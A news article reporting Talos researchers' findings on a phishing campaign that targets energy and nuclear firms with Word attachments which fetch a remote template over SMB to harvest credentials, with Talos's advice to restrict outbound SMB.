Phishing emails, used to steal credentials from critical infrastructure firms, can silently harvest data without even using macros, researchers have warned.
Hackers are targeting energy companies, including those working in nuclear power and other critical infrastructures providers, with a technique that puts a new spin on a tried-and-tested form of cyberattack.
Phishing has long been a successful method of attack, with cybercriminals crafting a legitimate-looking email and sending it to the intended victim along with a malicious attachment. Once executed, it runs code for dropping malware, which can be used for ransomware, stealing data, or another form of attack.
But now attackers can run phishing campaigns without malicious code embedded in an attachment, instead downloading a template file injection over an SMB connection to silently harvest credentials, according to researchers at Talos Intelligence.
While the attack method is currently only used to steal data, researchers warn it could be employed to drop other malware.
It’s the latest in a string of attacks which have exploited SMB flaws — although, unlike Petya or WannaCry, there’s no known relation between this and EternalBlue, the leaked NSA windows exploit which has been used to carry out global ransomware attacks.
Cyberattacks against critical infrastructure are not a new phenomenon, and since May 2017 hackers have been using this new technique to target energy companies around the world, predominately in Europe and the US, with the goal of stealing the credentials of those working in critical infrastructure. It’s not yet known who is behind the attacks or where they’re based.
Like other phishing campaigns, this attack uses emails relevant to the targets as a lure. In this instance, the emails often claim to be environmental reports or a CV, and come with an attached Word document that attempts to harvest data when opened.
Researchers say these documents initially contained no indications of compromise or the malicious macros associated with this sort of campaign. However, the attachments instead look to download a template file from a particular IP address which researchers found, instead of code, contained instructions for a template injection, establishing the connection to an external server over SMB.
However, while the attack is performed by exploiting SMB, the phishing itself is handled over HTTPS, and the user credentials are harvested via Basic Authentication with a prompt for the credentials.
Talos has responded to the attacks by contacting affected customers and ensuring “they were aware of and capable of responding to the threat”.
The researchers also say this threat “illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment”.
However, Talos says it is unable to share all indicators of compromise or who specifically has been targeted due to the “the nature in which we obtained intelligence related to these attacks”.